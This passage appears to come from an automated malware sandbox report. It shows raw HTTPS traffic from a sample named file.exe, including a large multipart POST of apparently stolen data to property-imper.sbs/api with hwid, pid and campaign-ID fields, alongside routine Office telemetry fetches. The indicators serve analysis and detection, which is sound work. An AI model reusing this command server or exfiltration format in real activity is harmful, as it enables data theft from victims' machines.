                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9698189B"
                                                                                                                                                                                              x-ms-request-id: b82db720-b01e-0053-528c-3acdf8000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123919Z-174c587ffdftv9hphC1TEBm29w000000049000000000gbu6
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:19 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              25192.168.2.649733104.21.33.1164435044C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:19 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=PWG0WVDT8ZRO
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 571299
                                                                                                                                                                                              Host: property-imper.sbs
                                                                                                                                                                                              2024-11-24 12:39:19 UTC15331OUTData Raw: 2d 2d 50 57 47 30 57 56 44 54 38 5a 52 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 46 41 41 38 34 45 46 37 30 36 45 31 35 45 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 50 57 47 30 57 56 44 54 38 5a 52 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 57 47 30 57 56 44 54 38 5a 52 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 50 57 47 30 57 56 44 54
                                                                                                                                                                                              Data Ascii: --PWG0WVDT8ZROContent-Disposition: form-data; name="hwid"0DFAA84EF706E15ED7CBBD6DF28D3732--PWG0WVDT8ZROContent-Disposition: form-data; name="pid"1--PWG0WVDT8ZROContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--PWG0WVDT
                                                                                                                                                                                              2024-11-24 12:39:19 UTC15331OUTData Raw: 3d ad cf dc b6 fe 36 21 5c 1f 3e 32 97 e2 0d 88 34 d1 9f 8a 07 a1 aa 80 c3 be 8e 70 f8 45 e2 cb 44 24 f9 77 2e 98 c3 d1 3d 30 57 44 78 43 12 a3 8d 82 ef f3 6e 46 a8 7f bd 36 6c 1b ab 36 ac f8 ea bb fd ec 0b 7b 6b f6 45 e6 f6 58 ce 4d 9f a4 69 38 20 c5 f4 7a 46 85 0f 18 d1 cc 33 a7 6c ff ba 6b db 6d 3f 12 59 81 26 3f 10 28 34 41 cf d1 70 ae a6 36 63 cf b1 32 bb 7c a4 76 1a a5 b8 87 32 fc 1f cf 55 87 cc 19 49 66 3e 47 51 7d 31 17 75 1a 02 42 f3 7b 60 21 c2 64 db e8 99 d1 4a 07 74 6d 81 a5 69 dc 2e ef d5 a1 3d 7d 6a 0b b7 8c 8d ea 51 12 f6 bd c6 e9 b8 1b 08 55 50 64 8f 38 64 54 4b 4b 4e 1d a4 ce b4 57 8b 93 a4 78 f5 41 26 4d db 97 b8 85 f3 e8 e9 98 0d cb 6a bf bf 65 f2 aa ab 4d 30 fe 13 c4 3c 81 02 b1 92 a0 cd 64 08 ae 80 4a a4 f0 47 9b e0 5c 0f 60 c1 1e da
                                                                                                                                                                                              Data Ascii: =6!\>24pED$w.=0WDxCnF6l6{kEXMi8 zF3lkm?Y&?(4Ap6c2|v2UIf>GQ}1uB{`!dJtmi.=}jQUPd8dTKKNWxA&MjeM0<dJG\`
                                                                                                                                                                                              2024-11-24 12:39:19 UTC15331OUTData Raw: bf b6 1b d1 e4 27 a9 47 16 dd 8c 9f 3b f6 05 84 85 0e 34 4b be 1a 6d ad 8d f9 21 9a 2c 5f a8 77 2c e2 c7 8e ac ef b4 ff c2 ab 3e 26 e7 15 6f 4e dd a7 86 38 2a 44 4a e1 fa 83 23 d4 69 4e c7 7a b9 ef 35 f9 1d fb 65 bc b1 bd da ce 26 35 dd 4b 83 52 13 b3 68 d4 9f 20 10 f6 d1 19 51 cc f8 a2 13 8d 9f cf 7b c3 11 dc a0 27 70 5a 79 27 bb d2 3c d1 83 2e f7 9c 94 f1 57 04 63 54 57 f3 ce 0c 55 18 1c c8 66 25 7c 55 42 b7 7f c7 94 55 93 de 7f d1 c7 17 d5 ff c9 30 f4 aa 3b c0 a8 bd c8 7f de 28 54 ed 28 ef 95 90 47 04 0f 72 a8 04 bc a8 24 a6 24 43 3f 91 98 10 4f 3d 16 60 b7 eb a5 68 55 8a da f5 d4 88 a8 97 89 7f 7f 66 74 4a 5d 77 e5 2b 29 8a dc 30 cd 4b c0 d4 48 65 79 63 97 7a 18 91 61 91 0c e2 ce 6a cc dd 40 82 9b bf 80 b8 73 9c cc d9 60 c7 93 c7 f0 a2 90 c0 43 8f f1
                                                                                                                                                                                              Data Ascii: 'G;4Km!,_w,>&oN8*DJ#iNz5e&5KRh Q{'pZy'<.WcTWUf%|UBU0;(T(Gr$$C?O=`hUftJ]w+)0KHeyczaj@s`C
                                                                                                                                                                                              2024-11-24 12:39:19 UTC15331OUTData Raw: f9 57 46 70 4c c0 d5 a4 ba 43 18 4b 26 de f4 f9 db 36 8d bc dd ca b3 e0 8a 50 5a cb 97 53 c2 b7 b5 a6 27 a8 15 ae c9 df 9d 2e ad e7 f8 71 c5 c1 6c 69 86 70 5a 85 80 14 7a 3a ee 45 00 42 74 b6 df 4e d3 95 1a 13 52 c6 8e 66 4a 80 81 0d ef d7 c7 50 4b b9 bd 23 a8 7d 0f 1c 2a 37 c5 07 7c 9b 95 48 19 ed 6b 5d 9b 64 83 d5 64 7c 0a 6b 5e e7 57 ce ce f4 ab 7b 2e 5b d9 58 d8 2a f6 fe 7c 65 e1 1e 07 17 06 86 26 e6 1f 15 b3 6c 83 ed 2e 1c 16 7d c6 72 73 43 3e 36 9e a8 7f 01 88 9e 9b e7 7d a4 aa ac 2d 79 eb 2b f4 66 4e 3c 2a 6a 16 1e f3 a7 5b 50 44 66 5c cc 83 15 e1 9a 6b 47 cb 85 c0 4e 78 3e 64 3d 0c a5 48 46 05 5b 64 95 b3 bb 17 2c 70 79 a7 1a ea 8d 7e c8 45 87 07 96 65 31 4e ef c5 0b 98 f2 35 fd e5 ae 10 f9 0b 2c e5 ff da 9c af 55 29 76 bf 79 79 64 ec 52 04 6f d1
                                                                                                                                                                                              Data Ascii: WFpLCK&6PZS'.qlipZz:EBtNRfJPK#}*7|Hk]dd|k^W{.[X*|e&l.}rsC>6}-y+fN<*j[PDf\kGNx>d=HF[d,py~Ee1N5,U)vyydRo
                                                                                                                                                                                              2024-11-24 12:39:19 UTC15331OUTData Raw: 2b e1 83 36 8e e3 aa 25 39 35 1f 23 c8 19 ca 7d 3d 96 e9 95 08 8f a1 54 33 91 7b 0c aa fd c7 b1 db bb 32 94 82 f7 69 88 e9 77 5e 16 72 ad a7 8d ff 7f c7 30 57 09 e4 db 02 9f 97 2a 54 19 dc c6 1b 24 d8 2f 9d ce 23 b2 e9 28 e9 c6 ba e5 af 99 5e 8f a2 30 f3 13 da eb b7 33 d1 ad 79 8b af ec a5 f5 38 45 4e 7a 8f 2a 80 e7 6f 5b 47 b2 32 4f 79 47 f0 62 f4 fa 0b 15 9b 0e 0f a4 1e 12 51 d4 1c 42 f6 81 df b6 a5 a1 84 f7 b0 e0 4c 33 48 b3 10 20 3b 0b 02 39 cd 6d f3 04 14 24 b9 25 b2 d1 df 47 21 f7 ea 71 f7 2d 0a 89 4f bb b9 6d cf 84 11 cb 60 7e ed 59 a8 3b b3 a2 4d 32 01 1c e7 3d 78 d7 4f 61 59 29 c9 c5 5c e9 e5 dd d2 25 05 44 14 24 c0 ed 5b ff ea ae a5 4c 1b 5a d5 45 d3 d9 45 c8 5d de c9 29 9d 1d 2b 82 80 30 e4 c1 f2 ce db 17 13 ab 70 73 11 45 75 5d 8e 33 40 f0 56
                                                                                                                                                                                              Data Ascii: +6%95#}=T3{2iw^r0W*T$/#(^03y8ENz*o[G2OyGbQBL3H ;9m$%G!q-Om`~Y;M2=xOaY)\%D$[LZEE])+0psEu]3@V
                                                                                                                                                                                              2024-11-24 12:39:19 UTC15331OUTData Raw: 14 45 90 e3 e8 bb 1b 1e 97 4f 88 5d 53 aa 59 18 f6 9e 89 62 9f 4c 5d 8c b7 f1 63 ce 3a 5b 3d 59 41 7b 63 ef 58 9c e5 2a 1f b2 28 95 72 39 15 16 43 8f b9 56 46 da 3f 48 0f 5d a4 45 ed 57 21 9a 1b 08 41 56 7a 40 8a 3b 6c f4 10 2a d7 f8 de 14 11 fe 94 48 6a 7b ab e7 6c 42 48 08 4b 1c 3f cf 50 7a 14 ee 59 be 92 f1 76 2e 63 96 99 40 f0 34 d3 10 bc 41 c7 ef 15 ac f1 7a 55 f9 c6 21 66 f7 99 44 c9 25 cd 1a 6c b2 01 a7 4a d4 3a f0 c7 bb ef 95 2b 60 25 2b b9 b2 4d 30 cc 75 dd e3 b3 65 81 5e 9b 75 38 04 5e 53 c6 67 8e 88 4c 74 60 6d c6 69 b3 4f 38 a6 98 ae 1c d2 ea 5c e5 fc 97 16 69 21 23 60 b6 b7 45 43 a4 76 15 42 c9 fd 39 7e e1 b6 41 27 c9 c7 0d 0e e9 69 15 ec 72 79 5d 67 09 d7 21 e1 eb d5 a1 b1 b0 75 bd d7 0f 4e c8 00 1b 67 15 8f 2c 73 89 75 8d 85 dc a5 b6 0a f4
                                                                                                                                                                                              Data Ascii: EO]SYbL]c:[=YA{cX*(r9CVF?H]EW!AVz@;l*Hj{lBHK?PzYv.c@4AzU!fD%lJ:+`%+M0ue^u8^SgLt`miO8\i!#`ECvB9~A'iry]g!uNg,su
                                                                                                                                                                                              2024-11-24 12:39:19 UTC15331OUTData Raw: c7 2b ff 35 5a 77 70 80 8b f0 ed a0 cb ac 91 bd db 6e ef 11 33 d0 23 61 d5 2a 3b 2d ef 22 09 ca ec 33 d9 c2 c1 0f 9d cf 23 3f 6b 6f 5f 4d b3 ac 68 fc 52 99 f6 e8 b9 fc ee d2 4b 17 0e 3e bf c2 60 1d a9 14 1f ec cd c3 61 70 0a 43 43 c3 0c 5a 5e 8f e9 b7 cb 21 df 5e 2a 4e cd 4e 1c 7a 3b 5f 7d 7e f9 90 fb 94 0c b9 bb 66 e9 8a fb c5 f0 ca a7 91 1e 2c 72 6e ed db 4b a7 a7 1c fa f5 2e 86 97 b8 7c f1 6b e8 79 f9 ee 4f c1 fa 71 1d 61 a7 2f 8a 90 d0 d5 27 22 59 34 31 72 8b 49 0f f7 a2 5a 3f 6e 40 60 99 78 80 b1 d4 c5 fe 1a 78 ea 39 ef a3 d7 01 8d 05 0e b7 a8 e2 d8 46 a0 4e c8 be e7 6d bc 17 0b 7d ec c3 05 6d e6 43 57 8f 50 69 2a eb cb 81 4a 2f 17 9f 7b 55 4d 65 72 9f 76 ba 84 db ef 1b f5 ca 0f f8 a8 77 fa 8b 7d 83 ff c2 4d f7 eb c3 0f 2f 86 73 27 97 79 cf 83 f8 17
                                                                                                                                                                                              Data Ascii: +5Zwpn3#a*;-"3#?ko_MhRK>`apCCZ^!^*NNz;_}~f,rnK.|kyOqa/'"Y41rIZ?n@`xx9FNm}mCWPi*J/{UMervw}M/s'y
                                                                                                                                                                                              2024-11-24 12:39:19 UTC15331OUTData Raw: 0a b8 fa fc a7 62 f0 02 bb e6 69 e8 55 df f6 c5 88 70 35 f9 a4 c5 b5 30 b1 91 2b 8b bb 75 c3 3b 3e 55 f2 69 ed ad e0 3a a8 64 7f c7 9c 43 4a 6f 40 c4 01 ab d1 77 fc a0 4f da 45 00 39 72 e5 8c 8c 72 1e 51 8b 8a 7f 50 ca bb 0b a3 5b 70 b3 10 85 bc 2e 68 23 d9 9d 76 2d 58 bb c0 6a bc 58 f4 36 c9 0f 77 99 ab fc 3a 38 57 94 86 88 78 b7 a0 53 10 fa fc e5 3e 11 f0 0a 47 3b ad cb 75 42 17 c8 4a a0 32 2e 00 e7 aa 7a 39 40 75 53 a2 1e e7 f0 d2 02 40 9c 1c 75 e3 05 22 08 4e 55 18 76 5d 10 01 ce 94 f1 7f b8 2a bf c0 85 7a 46 78 21 07 2e 0e ea 89 09 5c 1e f7 57 65 78 3d a7 1a 2a 14 b9 ce f5 20 a8 7f d6 10 86 13 5a 96 4e 40 c4 d7 9d 3d 96 f0 7a d5 01 84 6c a1 30 b7 55 e2 d2 f4 cc 51 20 09 dc 4f 32 21 09 5c 0f 06 34 6d 49 28 5c 7d 3c 94 fb 8d da cf 48 dc 49 60 dd 10 cf
                                                                                                                                                                                              Data Ascii: biUp50+u;>Ui:dCJo@wOE9rrQP[p.h#v-XjX6w:8WxS>G;uBJ2.z9@uS@u"NUv]*zFx!.\Wex=* ZN@=zl0UQ O2!\4mI(\}<HI`
                                                                                                                                                                                              2024-11-24 12:39:19 UTC15331OUTData Raw: 45 59 9d 52 92 41 6b d1 27 93 9e cb 27 9c 4a 4f a0 9f 74 fe 11 25 2c a3 2e 78 00 27 9f 49 0e dc 39 59 33 69 82 a6 a0 e0 ff 1a af ab d7 f7 63 33 ae a2 05 db c5 a8 ed 55 40 6a 1d 3d 6d 31 98 e6 47 68 e3 9d 38 d9 e0 76 60 e5 8b 01 59 7f ff 84 43 6e 56 12 5a 5b e4 ee f4 e2 92 22 dd 9a 1b e7 0a 9f fc 3e 61 4b e3 c8 0a fa 45 0f e1 17 fd 14 25 63 b5 c9 1d 15 46 93 f4 79 58 87 e5 33 4e 25 41 88 69 15 d0 75 86 58 0e 02 26 b3 aa a0 eb 28 d1 52 8e 82 62 7c 62 ba 45 c9 b3 79 e6 d0 c7 6a 03 64 6a 1b 1e 1d e9 2b 12 27 93 5a 7c 01 98 47 35 d0 44 ef 57 f8 bf 99 8e 2e 61 6b 71 a7 f6 f8 0a 36 af b7 0e d3 b9 d2 b9 97 72 3b dd da d8 1c 5c a5 32 f7 af a9 de e4 f4 78 78 fd e9 1f 9a 14 5c 0f 0d 15 53 f4 6a 95 23 fa 94 89 85 f2 af e9 44 53 8d 79 8d b9 c0 c1 01 a1 53 c0 86 96 0b
                                                                                                                                                                                              Data Ascii: EYRAk''JOt%,.x'I9Y3ic3U@j=m1Gh8v`YCnVZ[">aKE%cFyX3N%AiuX&(Rb|bEyjdj+'Z|G5DW.akq6r;\2xx\Sj#DSyS
                                                                                                                                                                                              2024-11-24 12:39:19 UTC15331OUTData Raw: c5 d4 0d 61 7c 5a 20 e3 ad 08 a6 ed 90 63 ee 38 3f 65 92 70 da 26 0d 45 41 b2 ee 95 a3 f9 e6 78 92 eb e6 ce 25 37 ed 59 0d 71 d1 6d cc 53 5f cc 33 15 2f 56 49 f0 ef 9b 6c b2 d5 7b ee fe 29 92 ae b7 98 40 4d 7c b5 d5 a9 9a 61 a4 07 21 91 a3 e1 ab ce 38 90 f9 04 86 56 ac e5 4c 18 36 48 4c 40 49 24 fe 3c 84 a4 0f a7 60 21 9a 10 31 21 9e d2 53 2c c8 18 ee 31 82 e0 48 ba c4 bf 0d 5a 2b e7 40 cc e2 9f cc d0 c7 68 86 18 46 4e 88 5d 1e 5c b3 3f f5 e9 f4 40 7f 38 b7 bd f4 72 f5 50 13 87 83 9d 0f 71 d5 70 1c ee d1 a6 4f f4 24 70 da 42 38 e6 dc 93 f2 dc cd cf d2 4d bd ab 0d 4d bd dc fe d4 a0 7c 10 96 10 a2 1f 1d dc 1c b2 47 32 a3 1f c9 33 ea b4 c1 33 3c ec a6 c8 ad d8 68 e9 af 18 79 f4 ae e4 93 7c e8 e4 f1 6e 02 a8 a8 a9 ab 9e 1d 05 64 0a 85 be 59 6f 54 2e e4 c0 7d
                                                                                                                                                                                              Data Ascii: a|Z c8?ep&EAx%7YqmS_3/VIl{)@M|a!8VL6HL@I$<`!1!S,1HZ+@hFN]\?@8rPqpO$pB8MM|G233<hy|ndYoT.}
                                                                                                                                                                                              2024-11-24 12:39:23 UTC1027INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:23 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=5v3qieknbnaq9fjk81atib3ki2; expires=Thu, 20-Mar-2025 06:26:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d5UU%2FI10gNpLyZUSjA0Yodwn%2FoZAIuC8StiD8WkH%2FiXPeGb%2BBr3RlvggHThRpfKYS9Trb8Zadeb1K0Y3%2FRl6YlXSgRFXSbdwUeJR3dZYONox%2FwCy2HQslWIWQerHpNp5r5T2JRg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e79760c5a184325-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3625&sent=196&recv=585&lost=0&retrans=0&sent_bytes=2844&recv_bytes=573842&delivery_rate=1193785&cwnd=180&unsent_bytes=0&cid=3be5d27bdbc8e50c&ts=3661&x=0"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              26192.168.2.64973513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:21 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:21 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 469
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                              ETag: "0x8DC582BBA701121"
                                                                                                                                                                                              x-ms-request-id: 000c37a0-d01e-002b-0920-3d25fb000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123921Z-15b8b599d88m7pn7hC1TEB4axw00000004mg0000000006kp
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:21 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              27192.168.2.64973713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:21 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:21 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                              x-ms-request-id: f380030e-501e-007b-0625-3d5ba2000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123921Z-178bfbc474bbcwv4hC1NYCypys00000005v0000000005fth
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:21 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              28192.168.2.64973613.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:21 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:21 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                              x-ms-request-id: 7fd471a5-f01e-00aa-27bf-3b8521000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123921Z-15b8b599d88phfhnhC1TEBr51n00000004hg000000009e8g
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:22 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              29192.168.2.64973913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:21 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
